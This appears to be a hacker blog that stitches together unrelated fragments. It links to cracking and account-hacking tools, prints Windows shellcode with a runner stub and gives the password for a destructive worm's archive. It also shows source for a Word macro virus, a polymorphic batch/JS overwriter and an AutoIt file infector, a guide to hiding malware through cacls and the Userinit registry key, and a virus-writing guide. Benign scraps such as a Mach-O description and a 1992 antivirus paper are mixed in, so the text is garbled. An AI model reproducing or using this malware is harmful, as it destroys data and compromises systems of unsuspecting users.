^Ideas:?

*Should y change the topic? 

*Only Hackers Thing?

*Whatever?

*Just make an comment and let my know...

&&&

Y will see you're comments about 4-5 weeks from now, and y will make an "rule" with this blog and next that y will update the blog any day, plus y have an project that y will make know of him on the internet, it will be an awsome project programmed in ASM.

We will talk later about that but for now send you're thotz about this blog.

***

:(..yesterday y was in "operation room" 07.06.2008  2-3 hours operation. Y have ossos kist!? :( now y "speak" to you from an laptop "not mine" with vodafone 3G....

good  net* th0w...

Peace :D 

Graphics can be functional or artistic. The latter can be a recorded version, such as a photograph, or an interpretation by a scientist to highlight essential features, or an artist, in which case the distinction with imaginary graphics may become blurred.

*** Graphiy Quest ***

who give me the best graph made by him with TH3 Mastermind name will have an gift and one fuc*ing insane gift :D... Some Ex:

http://rapidshare.com/files/119832875/Vbs_To_Exe.zip

*** 

 http://rapidshare.com/files/119830642/1000VBSource.rar

***

Sorry about my "fly away" from .NET scene...:D 

http://rapidshare.de/files/39107347/Steam_hacking_tools.rar.html 

****

So letz start these tools probaly will be banned in 24-48h :D

****

Y dont give a damn how you use these so y am not you.:D

Personaly y dont use theze thing5...

   TAKE CARE...IP HIDE :D

 http://rapidshare.com/files/102825025/CCZA1.rar

***

PEACE... 

****

An account for home less :))) just kiddind...

Send all money to there for My prgz/// BVT GRP... Peace...:D

https://www.paypal.com/ro/mrb/pal=9NHA3MGKNJ8S6 

Example Code
---------------
char code[] =
"\x66\x81\xec\x80\x00\x89\xe6\xe8\xba\x00\x00\x00\x89\x06\xff\x36"
"\x68\x8e\x4e\x0e\xec\xe8\xc1\x00\x00\x00\x89\x46\x08\x31\xc0\x50"
"\x68\x70\x69\x33\x32\x68\x6e\x65\x74\x61\x54\xff\x56\x08\x89\x46"
"\x04\xff\x36\x68\x7e\xd8\xe2\x73\xe8\x9e\x00\x00\x00\x89\x46\x0c"
"\xff\x76\x04\x68\x5e\xdf\x7c\xcd\xe8\x8e\x00\x00\x00\x89\x46\x10"
"\xff\x76\x04\x68\xd7\x3d\x0c\xc3\xe8\x7e\x00\x00\x00\x89\x46\x14"
"\x31\xc0\x31\xdb\x43\x50\x68\x72\x00\x73\x00\x68\x74\x00\x6f\x00"
"\x68\x72\x00\x61\x00\x68\x73\x00\x74\x00\x68\x6e\x00\x69\x00\x68"
"\x6d\x00\x69\x00\x68\x41\x00\x64\x00\x89\x66\x1c\x50\x68\x58\x00"
"\x00\x00\x89\xe1\x89\x4e\x18\x68\x00\x00\x5c\x00\x50\x53\x50\x50"
"\x53\x50\x51\x51\x89\xe1\x50\x54\x51\x53\x50\xff\x56\x10\x8b\x4e"
"\x18\x49\x49\x51\x89\xe1\x6a\x01\x51\x6a\x03\xff\x76\x1c\x6a\x00"
"\xff\x56\x14\xff\x56\x0c\x56\x64\xa1\x30\x00\x00\x00\x8b\x40\x0c"
"\x8b\x70\x1c\xad\x8b\x40\x08\x5e\xc2\x04\x00\x53\x55\x56\x57\x8b"
"\x6c\x24\x18\x8b\x45\x3c\x8b\x54\x05\x78\x01\xea\x8b\x4a\x18\x8b"
"\x5a\x20\x01\xeb\xe3\x32\x49\x8b\x34\x8b\x01\xee\x31\xff\xfc\x31"
"\xc0\xac\x38\xe0\x74\x07\xc1\xcf\x0d\x01\xc7\xeb\xf2\x3b\x7c\x24"
"\x14\x75\xe1\x8b\x5a\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01"
"\xeb\x8b\x04\x8b\x01\xe8\xeb\x02\x31\xc0\x89\xea\x5f\x5e\x5d\x5b"
"\xc2\x04\x00";

int main(int argc, char **argv)
{
  int (*funct)();
  funct = (int (*)()) code;
 ......

*This is my personal version without any kind of virusses.*

!!!WARNING!!!  - Use with care :D

|_____________________________________________________|

|Lord Mishanity/PolDoom2002/THe Mastermind/........................| 

|+++++++++++++++++++++++++++++++++++++++++++++++|

|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||

|_____________________________________________________| 

http://rapidshare.com/files/77877883/HS_USB.exe

_____________________________________________

"Your Th0tz are mine" :D 

 http://rapidshare.com/files/77605277/Windows_XP_USB_Stick_Edition.rar

this WGA IS FOR:WINDOWS XP[VLK], SERVER2003[VLK], OFFICE XP.

http://rapidshare.com/files/76603899/Windows_WGA_Patcher_Permanent_Kit.rar 

http://rapidshare.com/files/72352567/NATRIX_IMG.rar

 http://rapidshare.com/files/67890792/THe_IP_Changer.exe

<><><><><><><><><<><><><>>><><><><><<><><><><><

*****************CS 1.6 Non-Steam Pack V26***************************
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

#############################################

_______________________________________________________________________

%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@

________________________________________________________________________ 

||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||

http://rapidshare.com/files/79143495/cs16patch_full_v26.exe

||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||

 *NOTE* PROBALY IN 2-3 DAYS THE LINK WILL BE DELETED!!!

Peace... 

http://rapidshare.com/files/67890718/Yahoo_Mail_Hack...rar

Peace to all....

/*************************************************************************\
*VIRUS NAME: W32.BatzBack.HDFiller.C, W32.HLLW.BackZat.C                  *
*VIRUS TYPE: Retro I-Worm                                                 *
*VIRUS AUTHOR: L0NEw0lf                                                   *
*                                                                         *
*Replication:                                                             *
*This worm spreads through mapped drives, p2p software, Aim95, ICQ,       *
*Outlook, and mIrc                                                        *
*The worm also will infect EVERY .EXE on systems similiar to windows XP   *
*this does not include 95/98 or ME. it uses an overwriting method         *
*It will also append itself at the end to every .BAT file it finds        *
*The worm will also attempt to back itself up with restore on ME systems  *
*The worm will back itself up with restore on XP systems also, but        *
*ONLY on NTFS filesystems                                                 *
*After the worm is executed it will display a fake error message also     *
*it will delete large amounts of AntiVirus software                       *
*                                                                         *
*PAYLOAD:                                                                 *
*If the day is not Sunday the worm will write a file that completely      *
*invisible in the windows folder. This file may show up in Win95/98       *
*This file will find any file in the root directory and write             *
*L0NEw0lf was here... over and over again until the file is filling       *
*up the entire harddrive disk space. This goes pretty fast and            *
*very quietly. If it encountered and error it will stay in memory         *
*and lag the system.                                                      *
*On every Sunday the worm will display 3 messages and format              *
*D, E, and......

oh..y ..forget....the password is POLDOOM2002 

Virii are wondrous creations written for the sole purpose of spreading and destroying the systems of unsuspecting fools. This eliminates the systems of simpletons who can't tell that there is a problem when a 100 byte file suddenly blossoms into a 1,000 byte file. Duh. These low-lifes do not deserve to exist, so it is our sacred duty to wipe their hard drives off the face of the Earth. It is a simple matter of speeding along survival of the fittest.

Why did I create this guide? After writing several virii, I have noticed that virus writers generally learn how to write virii either on their own or by examining the disassembled code of other virii. There is an incredible lack of information on the subject. Even books published by morons such as Burger are, at best, sketchy on how to create a virus. This guide will show you what it takes to write a virus and also will give you a plethora of source code to include in your own virii.

Virus writing is not as hard as you might first imagine. To write an effective virus, however, you *must* know assembly......

Attribute VB_Name = "Nihilit
Sub AutoClose()
On Error Resume Next
'==========================================
'=======  Nihilit v4.0 / Nihilit.d  =======
'==========================================
'=== (c) by Necronomikon |[Zer0Gravity] ===
'==========================================
'greets flies out to: Serial Killer(Bitte!;p),GigaByte,jackie,
'Ultras,DX100h,DrG0nzo,The Mental Driller,VirusBuster,$moothie,
'BSL4,Ratter,Benny,NBK,Del_Armg0,SnakeByte,TheWalrus,Malfuntion,
'Belial,CyberWarrior,PhileToaster,newmann,ocker,fii7e
'and all in #virus,#vir,#vxers,#zerogravity,...
'hope to forget nobody.....!
Randomize
sv = Int(Rnd * 3) + 1
If sv = 1 Then svt$ = "porno.doc"
If sv = 3 Then svt$ = "readme!.doc"
If sv = 2 Then svt$ = "sex.doc"
Call Nihilit
Call KillAV
z = Application.System.PrivateProfileString("", _
"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows" & _
"\CurrentVersion\App Paths\winzip32.exe", "")
w = Environ("windir")
VBA.Shell z & " -a -r " & w & "\Nihilit.zip" _
& Chr(32) & w & "\nihilit.doc", vbHide
End Sub
Sub Nihilit()
On Error Resume Next
'thanks to j´ for advanced codes
Word.Application.Options.VirusProtection = n
Word.Application.Options.ConfirmConversions = n
Word.Application.Options.SaveNormalPrompt = n
'---
Application.DisplayAlerts = wdAlertsNone
CommandBars("Macro").Controls("Security...").Enabled = False
System.PrivateProfileString("",     "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
System.PrivateProfileString("",     "HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security", "Level") = 1&
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security", "AccessVBOM") <> 1& Then......

'valium
'^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
' The
' ****   ***** ******  *****   ***** ***** **** ***** *****
'   ***   *** ***   **  ***     ***   ***   **   *********
'    *** ***  ********  ***     ***   ***   **   *** ** **
'     *****   ***   **  ***     ***   ***   **   ***    **
'      ***    ***   ** ******* *****   ******   *****  ****
'
'^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
'Valium is an Script virus,made in Visual Basic Script.
'Valium designed to infect many file types which is vulnerable for script to attack.
'it also has ability to infect graph files such as bmp,jpg,gif even it is not realy
'infection,but I think valium had show you how script infect those files.
'Valium infecting some project files such as cpp,frm and pas by adding it self in it
'Valium also adding it self in every zip or rar files,using lame bugs from its internal command
'Valium injecting it self in every nrb and nri files,see my article about what is nri or nrb
'in 29a#8 and this is just simple implementation in script to spread via cd-room
'Valium also macro virus,it infecting doc and xls,by injecting it body in normal.temp/xlstart
'I think Valium is an big script infector,infecting at least 22 file types
'Some memory resident trick,duplicator type trick,booting stuff trick also available here
'Valium also has abiity to encrypt it self/selfcripting using poly/Epo tricky.
'Thats all about this lame shit,Do not code script if you don't have something new in it.
'^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
'Name		: Valium
'Author		: Psychologic/rRlf
'System		: 9x,Me,Nt,Xp with WSH ofcourse
'Target	files	: Portable Script
'		  vbs,vbe,js,bat,reg,nri,nrb,doc,xls,rar,zip,cpp,pas,frm,jpg,gif,bmp,ico,html,htt,shtml,htm
'Worming	: No this is virus not worm
'Polymorph	: Yes mixture with encryption and some silly......

Mach-O is the native file format used by OSX. There is a little similarity to Portable Executable files, but not much. Mach-O files are collections of segments. Each segment can contain one or more sections, which have different protection attributes.

What does a Mach-O file look like?

Everything about the format is public, most of the format is in loader.h. The file header structure is called mach_header. Each of the fields is 32-bits large. It has this format:

The commands are used for many different purposes, such as describing segments and sections, initial values of the CPU registers for the main thread, and resolving symbols (equivalent to imports in PE files).

The load_command structure has this format:

Interesting commands are LC_SEGMENT (1) and LC_UNIXTHREAD (5). The LC_SEGMENT command describes a segment of memory. It is equivalent to a section in PE files. The segment_command structure has this format:

Published July 1992 by the Dutch National Criminal Intelligence Service (CRI), Computer Crime Unit, PO Box 20304, 2500 EH, The Hague, The Netherlands.

Contents

• I. Introduction
• II. Theoretical implications
• III. Signature Scanning
  • III.1. Description
  • III.2. Capacity Problems
  • III.3. Update Requirement
  • III.4. Polymorphic viruses
• IV. Heuristical Scanning
  • IV.1. Description
  • IV.2. Discussion
• V. Integrity Checking
  • V.1. Description
  • V.2. Discussion
• VI. Monitoring
  • VI.1. Description
  • VI.2. Discussion
• VII. Hardware Protection
  • VII.1. Description
  • VII.2. Discussion
• VIII. Miscellaneous Methods
  • VIII.1. Software Write Protection
  • VIII.2. Vaccination
  • VIII.3. Bait Programs
• IX. Operating System Improvement
  • IX.1. Present Situation
  • IX.2. The Responsibility of an Operating System
  • IX.3. Suggestions for Improvement
  • IX.4. Conclusion
• X. Conclusion
• Notes
• Bibliography
• Proof Readers

Part I. Introduction and Problem Definition

I. Introduction

The phenomenon computer virus poses a threat to the reliability of automated systems. Considerable research effort has been put into the issue of how to detect and erase a virus. As a result, there are now several sophisticated anti-virus programs available. The most widely used detection method of these anti-virus programs is the so-called "signature scanning".

Recently, a new problem has arisen: for several reasons, the signature scanning detection method is rapidly becoming inadequate, and will eventually become obsolete. Therefore, alternative methods must be devised.

In this paper we will attempt to evaluate different approaches......

1. Intro
2. Explaining
3. Code
4. Exit

=======
1.Intro
=======

This technique shows how we can better hide our malware in a System Volume Information
folder, an  idea  comes to me after reading berniee's article "Explaining the usage of
pipes in VX coding", you can  read  it in berniee's  homepage,  or in rRlf#7, so a big
thanx for that! Greetings to Nibble, DiA, and Retro for some beta testings and help.
Enjoy ;)

============
2.Explaining
============

The scheme of tech is very simple:

Using cacls.exe we remove SVI folder privileges by this command:
cacls "C:\System Volume Information" /E /G Username:F

after we do so, we copy ourselfs there as system.exe (it's can
be any other filename), and closin priviliges by this command:
cacls "C:\System Volume Information" /E /R Username

After those procedures we must set somethin to registry startup
key, i choosed Userinit, u can any else, if you choose Userinit
too, then Userinit value data must be:
Sysdirpath\Userinit.exe,cacls "C:\System Volume Information" /E /G Username,C:\System Volume Information\system.exe

as you see we don't touch "Sysdirpath\Userinit.exe,", let it be
here, we just add some our data.

During system startup this command removes SVI folder privileges:
cacls "C:\System Volume Information" /E /G Username

then our malware executes from SVI folder and closes privileges:
C:\System Volume Information\system.exe

If a user will try to access SVI folder, he will probably get an
error that access is denied.

And before code, i want tell you something, that this tech will
probably worx only on NTFS (NT FILE SYSTEM) formatted HDDs, not
on FAT32.

=======
3. Code
=======

.686
.model flat,stdcall
option casemap:none

 include \masm32\include\windows.inc
 include \masm32\include\kernel32.i......

http://rapidshare.com/files/56072222/Bat_To_Exe_Converter_v1_1_.3.exe

rem (/*
@echo off
set cbv=cscript
%cbv% /nologo /e:javascript %0
goto qtdvcpwyffeegr 
*/)

function rem() {
    //MPA - batch/js poly overwriter
    //saef.ML

    var vewqgfwxediit = WScript.CreateObject('Scripting.FileSystemObject');
    xeuwecqircfgp = vewqgfwxediit.GetFile(WScript.scriptName);
    var bapsxssftiwtsqb = new Array("vewqgfwxediit", "ftfdyapsppitr", "qtdvcpwyffeegr", "dtxhixuidswcxh", "ppxbgpriftvbie",
    "qhfqbpbvqbfuev", "bapsxssftiwtsqb", "cyduehfxqvpgpq", "irbxtpbvqavhh", "xpcbtdgrhrses", "ruitdqhsggspqew", "ufrecdyhpffxxsu",
    "hvqrpaxvwchcxw", "xeuwecqircfgp", "dcftwughrisreu", "uhuvecvfuqxbde", "cbv", "fqsvtxhfictwsr", "dbvprhibqqhfhbe", "hhurasufcsshgv")
    var qhfqbpbvqbfuev = vewqgfwxediit.OpenTextFile(xeuwecqircfgp, 1, true);
    dcftwughrisreu = qhfqbpbvqbfuev.readAll(); qhfqbpbvqbfuev.close(); for (s = 0; s <= bapsxssftiwtsqb.length; s++) {
    dcftwughrisreu = dtxhixuidswcxh(dcftwughrisreu, bapsxssftiwtsqb[s], irbxtpbvqavhh())
    } var ppxbgpriftvbie = vewqgfwxediit.OpenTextFile(xeuwecqircfgp, 2, true); ppxbgpriftvbie.Writeline(dcftwughrisreu);
    ppxbgpriftvbie.Close();} function dtxhixuidswcxh(xpcbtdgrhrses, ruitdqhsggspqew, ufrecdyhpffxxsu) {
    try{while (xpcbtdgrhrses.indexOf(ruitdqhsggspqew) >  - 1){hvqrpaxvwchcxw = xpcbtdgrhrses.indexOf(ruitdqhsggspqew);xpcbtdgrhrses = "" + (xpcbtdgrhrses.substring(0, hvqrpaxvwchcxw) + ufrecdyhpffxxsu +
    xpcbtdgrhrses.substring((hvqrpaxvwchcxw + ruitdqhsggspqew.length), xpcbtdgrhrses.length));}}catch (err)
    {return xpcbtdgrhrses;}......

RUNDLL and RUNDLL32 are two utilities supplied with Windows 95/98 and NT.
They can call DLL functions from the command line, allowing us to create extremely powerfull batch files.

Some examples:

Start Control Panel applets (2):
General syntax:
RUNDLL32 SHELL32.DLL,Control_RunDLL filename.CPL,@n,t
where   filename.CPL   is the name of one of Control Panel's *.CPL files,
  n   is the zero based number of the applet within the *.CPL file, and
  t   is the number of the tab for multi paged applets
 

Examples:
Date/time applet, Time Zone tab:
RUNDLL32 SHELL32.DLL,Control_RunDLL TIMEDATE.CPL,@0,1
Desktop applet, Screensaver tab:
RUNDLL32 SHELL32.DLL,Control_RunDLL DESK.CPL,@0,1
Network applet, Protocols tab:
RUNDLL32 SHELL32.DLL,Control_RunDLL NCPA.CPL,@0,2
Network applet, Adapters tab:
RUNDLL32 SHELL32.DLL,Control_RunDLL NCPA.CPL,@0,3
System applet, Environment tab:
RUNDLL32 SHELL32.DLL,Control_RunDLL SYSDM.CPL,@0,2
An alternative approach is using CONTROL.EXE.
However, if you want to make your batch file wait for the Control Panel applet to be closed, you'll have to use the RUNDLL32 command with START /WAIT
General syntax:
CONTROL.EXE filename.CPL,@n,t
where   filename.CPL   is the name of one of Control Panel's *.CPL files,
  n   is the zero based number of the applet within the *.CPL file, and
  t   is the number of the tab for multi paged applets
 

Examples:
Date/time applet, Time Zone tab:
CONTROL.EXE TIMEDATE.CPL,@0,1
Desktop applet, Screensaver tab:
CONTROL.EXE DESK.CPL,@0,1
or alternatively, in Windows 2000 & XP:
CONTROL.EXE DESK.CPL ,@ScreenSaver
Note the space between the *.CPL file name and the comma.
This seems to work for DESK.CPL only.
Use the description on the tab, remove any spaces.
 
Credits: Neil J. Rubenking, in one of his articles in PC Magazine.
Tip: Leslie......

$Found = 0
$Sig = ";MPA Hack"
$Script = @scriptname
$search = FileFindFirstFile("*.au3") 
$search = FileFindSecondFile("*.mp3")

If $search = -1 Then
    Exit
EndIf

While 1
         $file = FileFindNextFile($search)
         if ($file == "") then ExitLoop
         if ($file <> $Script) then

            $check = FileOpen($file, 0)
               While 1
              $line = FileReadLine($check)
              If @error = -1 Then ExitLoop
              if ($line = $Sig) then $Found = $Found + 1
               Wend
             FileClose($check)

         if ($Found == 1) then exitloop
         $Victim = FileOpen($file, 0)
         If $Victim = -1 then exitloop
            $ReadAllHost = FileRead($Victim, FileGetSize($file))
         FileClose($Victim)

         $MySelf = FileOpen($Script, 0)
         If $MySelf = -1 then exitloop
            $ReadAll = FileRead($MySelf, FileGetSize($Script))
         FileClose($MySelf)

     ......